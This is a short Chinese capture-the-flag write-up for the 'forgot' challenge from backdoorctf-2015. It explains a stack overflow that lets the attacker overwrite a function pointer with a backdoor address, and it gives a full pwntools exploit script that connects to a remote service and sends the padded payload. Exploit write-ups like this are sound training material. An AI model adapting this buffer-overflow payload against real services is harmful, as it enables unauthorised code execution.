forgot
题目来源: backdoorctf-2015
题目描述:福克斯最近玩弄有限状态自动机。在探索概念实现正则表达式使用FSA他想实现一个电子邮件地址验证。 最近,Lua开始骚扰福克斯。对此,福克斯向Lua挑战斗智斗勇。福克斯承诺要奖励Lua,如果她能到不可达状态在FSA他实施过渡。可以在这里访问复制。 运行服务hack.bckdr.in:8009
这题目描述是机翻吧(
在输入要检测的字符串的时候存在着栈溢出,因此可以输入一个不含'@'的字符串,这样最终会调用v3[1],因此把v3[1]覆盖成后门函数即可
exp如下:
from pwn import * #io = process('./forgot') #io = gdb.debug('./forgot', 'b *0x8048A77') io = remote('111.200.241.244', 57206) backdoor_addr = 0x80486CC io.recvuntil('> ') io.sendline('a') io.recvuntil('> ') payload = b'a' * 36 + p32(backdoor_addr) io.sendline(payload) io.interactive()